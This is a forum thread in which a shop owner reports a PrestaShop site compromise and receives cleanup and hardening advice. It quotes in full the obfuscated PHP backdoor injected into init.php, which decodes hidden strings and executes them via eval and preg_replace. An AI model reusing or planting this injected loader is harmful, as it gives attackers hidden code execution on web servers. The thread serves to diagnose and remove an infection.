Strange code in my .php files

[Jerz]

Yesterday the shop was functioning fully normally, but today in the morning both - front and back end - sites were just blank, white pages. I didn't do any updates to modules or prestashop. What I found out was strange code in most of php files on their beginning. Below example form init.php (main directory)

<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $wzvsmxqzyo = ']y3f]63]y3:]68]y76#<%x5c%x78e%x5c%x78b%x5c%x78%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*x5c%x7878pmpusut!-#j0#!%x55c%x7825fdy>#]D4]273]D%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7825!<25)tpqsut>j%x5c%x7825!*9!%x5c%K3#<%x5c%x7825yy>#]D6]281L1#%x5c:!>!#]y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4c#<!%x5c5c%x7824-%x5c%x7824*<!%x5%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7Oh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7%x7825:-t%x5c%x7825)3of:opjudovg<~%x5c%x7824x5c%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%x5%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73",825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQeTf#<%x5c%x7825tdz>#L4]275L3]248L3P6L1M5]D2P47825ggg!>!#]y81]273]y76]258]y6g]273]y7OBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR%x5c%x7%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x5c%x7824-%x5c%x7824b!>825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825j^x5c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x782c%163%x74%162%x5f%163%x70%154%x69%164%K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%x78786<C%x5c%x7827&6<*rfs%x5x5c%x785cq%x5c%x7825%x5c%x7827Y%x%x7825%x5c%x7827jsv%x5c%x78256<C>^0fmjg}[;ldpt%x5c%x7825}%x782f#o]#%x5c%x782f*)323zbe!-#jt0*?hnpd!opjudovg!|!**#j{hnpd#)tutjyf%x]275]y83]273]y76]277#<%x5c%x7825t2w>#]y74]273]y76]252]y85c%x785csboe))1%x5c%x782f35.)1%x5c%x764y]552]e7y]#>n%x5c%x7825<#372]58y%x5c%x7825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x56R85,67R37,18R#>q%x5c%x7825V<*#fopoV;hojepdo5c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x5c%x7825%x5c%x787f!~!<##!>!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%xpjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7822!f%x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:55;tuofuopd%x5c%x7860ufh%x5c%x786%x5c%x7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x50%x2e%52%x29%57%x65","%x65%166%x61%154%x28%151%x6d%160%x6c%157%x64%145x7825!|Z~!<##!>!2p%x5c%x7825!|!*!***b%x5c%x7825)sf%c%x7824-%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%x78:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:x7827!hmg%x5c%x7825)!g%x7825>2q%x5c%x7825<#g7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x7825h!>!%xreturn chr(ord($n)-1);} @error_reporting(0); preg_replace("%x2f%5_GMFT%x5c%x7860QIQ&f_UTPIif((function_exists("%x6f%142%x5f%163%x74%10;quui#>.%x5c%x7825!<***f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%xx5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%x825)ufttj%x5c%x7822)gj6<^#Y#%!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b#[#-#Y#-#D#-#W#-#C#-#O#-#Nf]51L3]84]y31M6]y3e]81#%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825)+o825tmw)%x5c%x7825tww**WYsboepn)%x5c%x7825bss-%x5c%x7825r%x5c**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x782x5c%x7825)utjm6<%x5c%x7875c%x7825b:>1<!fmtf!%x5c%x7825b:>#*%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%x7824-tusqpt)%x5c%x7825z-#:#*%x57827,*b%x5c%x7827)fepdof.)fepdof.%x5c%x7c%x7860msvd},;uqpuft%x5c%x7860msvd}+;!>!}ufhA%x5c%x78272qj%x5c%x78256<^#zsfvr#c%x78257-C)fepmqnjA%x5c%x7827&6<.fmjgA%x5c%x7827doj%x5c%x786P2L5P6]y6gP7L6M7]D4]275]D:M8]D25%x5c%x7824-%x5c%x7824*<!~!dsx5c%x7827{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x75c%x7825_t%x5c%x7825:osvufs:~:<*9-1-r%x5c%*#57]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%Rk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW&)7gj6<.[A%x5c%x7827&6<7R37,#%x5c%x782fq%x5c%x7825>U<#16,47R57,27R66,#%x5c%x782fq%x5c%x5c%x785cq%x5c%x78257%x5c%x782f7#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x5c7825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfspde>u%x5c%x7825V<#65,47R25,d7R17,6%x782f#0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f#0<!%x5c%x7825o:!>!%x5c%x78242178}527}88:}334}472%x5c%x78tmbg)!gj<*#k#)usbut%xx5c%x78273qj%x5c%x78256<*Y%x5c%x7825)fnbozcY]y83]248]y83]256]y81]265]y72]254]y76#<%x5c%x7825tmw!>!#]y84udovg}k~~9{d%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:7#x7825!<*::::::-111112)eobs%x5c%x7860un>qp%x5c%5iN}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x7pph#)zbssb!-#}#)fepmqnj!%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hK9]78]K5]53]Kc#<%x5c%x7825tpz!>!#]D6M7]825w6Z6<.5%x5c%x7860hA%x5c3]y76]271]y7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5;opjudovg}%x5c%x7878;0]=])0#)U!%0LDPT7-UFOJ%x5c%x7860GB)fubfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78824<!%x5c%x7825tzw>!#]y76]277]y72]265]y39fbuf%x5c%x7860gvodujpo)##-!#~<#%x5c%x782f%x5c%WCw*[!%x5c%x7825rN}#QwTW%x5c%x7825hIr%x5c%x7x7825%x5c%x7824-%x5c%x7824!>udovg}{;#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv%x5c%x782%x5c%x7825h>EzH,2W%x5c%x7825wN;#-Ez-1H*97f-s.973:8297f:5297e:56-%x5c%x7878r.985:5%x5c%x7878:!>#]y3g]61%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:) { $GLOBALS["%x61%156%x75%156%x61"]=1; function fjfgg($n){76]61]y33]68]y34]68]y33]65]y31]53]y6d]281]y43]78]82f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%x445]212]445]43]321]464]%x5c%x7825s:%x5c%x785c%x5c%x785)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x5c%x7825-bf#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe284]364]6]234]342]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5%x5c%x78256<*17-SFEBF71]y7d]252]y74]256]y39]252]y83]273]y72]282#<!%x5c%x7825tjw!>!#]y84]275x782fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x82f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%827pd%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>:h%x5c%x7825:<#QcOc%x5c%x782f#00#W~!Ydrr)%!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x5c%x7860%x5c%x77f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7gj6<*doj%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w%x5c%x7860TW~%x5cx7827{ftmfV%x5c%x787f0%x28%42%x66%152%x66%147%x67%42%xx5c%x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]26)}.;%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%x552985-t.98]K4]65]D8]86]y31]278]y3 NULL); }]y74]275]y7:]268]y7f#<!%x5c%x7825tww!>!%x5c%x782400~:<h%x822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5cx5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323%x7825t::!>!%x5c%x7824Ypp3)%x5c%x7825cB%x5c%x782K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825]274]y85]273]y6g]273]y76]2#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-Rd%x5c%x7825)Rb%x5c%x7825))!gj!<de:4:|:**#ppde#)tutjyf%x5c%x78604%x5c%x782x5c%x787f!<X>b%x5c%x7825Z<#opo#>b%c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%zsfvr#%x5c%x785cq%x5c%x7x7825)s%x5c%x7825>%x5c%x782fh%x5c%x7825:<*},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7dov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppW%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c3]Kc]55Ld]55#*<%x5c%x82f!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sI,6<*127-UVPFNJU,6<*27-SFGT%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c41%x72%164") && (!isset($GLOBALS["%x61%156%x75%156%x61"])))sfqmbdf)%x5c%x7825%x5c%x7824-%256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x7825%x5c%x7878:-!%x5c%x25j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%x7825s:%x5c#zsfvr#%x5c%x785cq%x5c%x78257**^#fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x78257>%x5c%x782f7&6|7**111127-j!~<ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c%x7825!<**3-j%x5c%x7825-bubE{h%y33]65]y31]55]y85]82]y76]jyf%x5c%x7860%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pt)fubmgoj{hA!osvufs!~<3,25r%x5c%x7878W~!Ypp2)%x5c%x7825c%x787f;!osvufs}w;*%x5c%x787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjF.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tut257>%x5c%x782272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj3hopmA%]472]37y]672]48y]#>s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7f%x5c%x7878pmpusut)tpqssutRe%x5c%x7825)%x7825nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]368]322]3]364]6%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>26]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]y5c%x78256<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%827id%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#ujojx782f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv%x5c%x1y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{5-*.%x5c%x7825)euhA)3of>2bd%x5c%x7825!<5h%x5c%x7825%x5c6#)tutjyf%x5c%x7860439275ttfsqnp*5!%x5c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg]+^?]_%x5c%x785c}X%x5c%x7*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%b%x5c%x7825!<*qp%x5c%x78250%x22%134%x78%62%x35%165%x3a%146%x21%76%x21%50%x5c%x782c%x7825<#762]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x72)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x78612>j%x5c%x7825!|!*#9j%x5c%x7825>j%x5c%x7825!*3!%x5c%]256]y6g]257]y86]267]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]524<!%x5c%x7825mm!>!#]y81]273]y76]258]y6g]27825l}S;2-u%x5c%x7825!-#2#%x5c%x<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)p%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFHB%7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#T782f#%x5c%x7825#%x5cc%x78257-K)fujs%x5c%x78%x782f#M5]DgP5]D6#<%x38M7]381]211M5]67]452]88]5]48]32M3]317]c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)54l}%x5c%x7827827!hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x78ubE{h%x5c%x7825)sutcvd%x5c%x78256<C%x5c%x7827pd%x5c%x78256|6.7eu{66~67<&w6<c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%x5c%x7824zB%x5c%x7825z>!tussfw)%x5c%x7825zW5c%x7860cpV%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x787f<u%x5c%x7825V%x5c%%x28%141%x72%162%x61%171%x5f%155%x61%16c%x7824-%x5c%x7824!>!tus%x5c%x7860;%x5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opj%x7825j:=tj{fpg)%x5c%x7825s7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%x5c%x7825)sutcvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!%x5c%x7825)gpf{jt)!gj!<*2bd]283]427]36]373P6]36]73]83]276]277]y72]265]y39]271]y83]256]y78]248]y83]256]y81]265]y72]254]y!fyqmpef)#%x5c%x7824*<!%x5c%x7825kjzbek!~!<b%x5c%x7825%c%x782f!**#sfmcnbs+yfeobz+sfwjids%x5c%x787f;!|!}{;)gj}l;33bq}k25w:!>!%x5c%x78246767~6<Cw6<pd%x5c%x7b%x5c%x7860bj+upcotn+qsvmt+fmhx7827!hmg%x5c%x7825!)!gj!<2,*j%x5/(.*)/epreg_replacehqhzfwgaft'; $fjijxrgwdr = explode(chr((226-182)),'2438,43,6911,59,4830,59,2348,65,1966,70,9523,39,5840,33,1145,39,8506,56,4745,22,0,46,10006,37,4272,26,8617,58,5475,48,5523,27,7425,39,9302,54,8443,38,2886,25,7206,64,1184,67,9087,23,8089,35,8171,51,417,62,2845,41,8675,41,4383,69,7639,68,3882,44,3160,37,3587,70,1284,34,7173,33,6489,24,2587,29,1251,33,8023,66,5702,63,3197,59,7000,55,2551,36,3657,64,5307,21,6843,27,875,49,8124,47,3463,62,349,68,1891,31,1318,23,6234,52,5932,45,3119,41,1922,44,7519,67,4611,54,5038,47,9281,21,7464,24,8736,32,10073,33,7761,61,9224,57,195,30,2238,22,7270,69,9719,51,8378,40,130,65,8716,20,8222,69,1377,35,1634,65,2616,62,9770,27,7925,37,8481,25,8291,55,3755,51,2481,70,3079,40,5439,36,4052,46,2036,51,82,26,9944,33,10043,30,4161,31,6788,55,7822,39,6342,32,5188,53,2413,25,8955,70,6139,47,9924,20,6416,34,6593,56,6076,63,4767,63,5644,58,986,52,9170,54,9596,55,3985,67,8346,32,6649,63,6374,42,2736,49,1756,68,3861,21,9454,69,5819,21,8909,46,3721,34,3525,62,2260,22,1590,44,7586,53,7364,61,6555,38,9977,29,4351,32,3317,47,8878,31,9067,20,1341,36,8418,25,4452,41,6286,26,5328,70,3926,59,1412,57,8768,20,6019,57,3364,42,6513,42,3406,57,5398,41,9678,41,5550,67,1505,34,7707,54,8562,55,536,44,3806,55,8835,43,4298,53,9356,64,1038,47,924,62,3012,67,9562,34,6970,30,5873,59,46,36,1699,57,324,25,2087,63,3287,30,4493,46,4583,28,9889,35,257,67,6186,48,4098,63,741,53,5617,27,1085,60,7488,31,9420,34,4665,39,4539,44,4192,41,479,57,2785,60,1824,67,4704,41,5977,33,2704,32,5085,51,4233,39,225,32,9110,21,108,22,3256,31,794,43,8788,47,6767,21,2282,66,5136,52,6870,41,7861,64,9797,28,9131,39,4985,23,5241,66,1469,36,4938,47,2191,47,6712,55,9651,27,2150,41,2911,32,5008,30,7122,51,634,66,1539,51,6450,39,580,54,5765,54,7055,67,9025,42,6312,30,2678,26,2943,69,837,38,7962,61,9825,64,4889,49,7339,25,700,41,6010,9'); $unshnoyqxo=substr($wzvsmxqzyo,(40686-30580),(46-39)); if (!function_exists('vptixarjmb')) { function vptixarjmb($qqyfwrgwbs, $uhustkeona) { $xpopuareeu = NULL; for($tnaspehgts=0;$tnaspehgts<(sizeof($qqyfwrgwbs)/2);$tnaspehgts++) { $xpopuareeu .= substr($uhustkeona, $qqyfwrgwbs[($tnaspehgts*2)],$qqyfwrgwbs[($tnaspehgts*2)+1]); } return $xpopuareeu; };} $jkgrqpeeoi="\x20\57\x2a\40\x66\150\x6a\142\x65\143\x72\154\x76\156\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\62\x39\55\x31\71\x32\51\x29\54\x20\143\x68\162\x28\50\x34\63\x33\55\x33\64\x31\51\x29\54\x20\166\x70\164\x69\170\x61\162\x6a\155\x62\50\x24\146\x6a\151\x6a\170\x72\147\x77\144\x72\54\x24\167\x7a\166\x73\155\x78\161\x7a\171\x6f\51\x29\51\x3b\40\x2f\52\x20\153\x7a\146\x63\147\x66\143\x6d\171\x65\40\x2a\57\x20"; $cfrfbrhwlx=substr($wzvsmxqzyo,(60237-50124),(73-61)); $cfrfbrhwlx($unshnoyqxo, $jkgrqpeeoi, NULL); $cfrfbrhwlx=$jkgrqpeeoi; $cfrfbrhwlx=(818-697); $wzvsmxqzyo=$cfrfbrhwlx-1; ?>

I have no idea how it came there, just made a recovery from last backup (made one day earlier - lucky me) and everything seems to be fine. Any clues what to do to not let that happen again?

[El Patron]

I did see something via search on this

http://security.stackexchange.com/questions/70579/is-this-a-backdoor

[Jerz]

I did see something via search on this

http://security.stackexchange.com/questions/70579/is-this-a-backdoor

Thanks, seems to be the same issue - now the code is back there again. The question is what to do next? I'm now changing all passwords, shop is in maintenance mode but I'm afraid that wont be enough. 

[El Patron]

I suspect that the back up has been infected, when you restore then it propagates.

 

change all ftp passwords

ensure file permissions are sound, typical 755 folders 644 files

 

you can also try this trick, ensure you have up to date anti-virus like bit defender, download your remote files to your computer and run anti-virus.  Then if any detected you can for native ps download the version you are using then replace infected file with native.

 

another little tip, using ftp, look for files that have different filed time/date stamp..

 

sorry you have this issue, it's very frustrating

[Jerz]

Thank you very much again! 

 

I checked everything as you wrote and I think I found the source of the problem. There was also Wordpress installation on same server and it has been hacked - some other users except admin were added. So wordpress has been uninstalled, Prestashop recovered again with backup and it seems to be clean now, but I will monitor it for next days if the problem won't be back.

[El Patron]

yes I assumed that wordpress installed but didn't want to say anything.

 

something happened to me a few years ago.  I felt a bit violated so I wrote this for my own use

https://www.prestashop.com/forums/topic/303132-module-prestavault-malware-trojan-virus-protection/

 

I'm happy you have made progress.